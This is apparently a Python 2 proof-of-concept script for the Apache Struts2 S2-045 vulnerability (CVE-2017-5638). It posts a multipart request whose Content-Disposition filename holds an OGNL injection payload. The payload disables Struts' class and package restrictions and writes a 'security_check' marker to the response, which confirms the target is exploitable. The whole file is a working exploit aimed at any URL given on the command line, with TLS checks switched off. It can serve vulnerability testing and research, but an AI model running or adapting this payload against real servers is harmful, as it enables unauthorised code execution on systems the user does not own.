exploitS2-045-Content-Dispo.py

#!/usr/bin/python

import urllib2
import requests
import httplib

from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

#uso: python script.py <url> "<command>"


def exploit_cd(url):
	cd_boundary = "---------------------------735323031399963166993862150"
	content_type = "multipart/form-data; boundary=%s" % (cd_boundary,)

        filename_payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}.b"

	cd_name = "test"
	cd_payload = "--%s\r\nContent-Disposition: form-data; name=\"%s\"; "
	cd_payload += "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n"
	cd_payload = cd_payload % (cd_boundary, cd_name, filename_payload, cd_boundary)

	try:

		headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': content_type}
		#request = urllib2.Request(url, headers=headers)
		request = requests.post(url, cd_payload, headers=headers,verify=False)
		#page = urllib2.urlopen(request).read()

	except httplib.IncompleteRead, e:

		request = e.partial

	print(request.text)

	return request


def main():
	import sys
	if len(sys.argv) != 2:
		print("Usage: %s <url>" % sys.argv[0])
		return
	print("");
	print("\te.g: %s http://localhost/" % sys.argv[0])
	print("");

	print("[*] CVE: 2017-5638 - Apache Struts2 S2-045")
	url = sys.argv[1]

	print("[*] Testing Content-Disposition exploit - Postive is response security_check")
	exploit_cd(url)


if __name__ == '__main__':
	 main()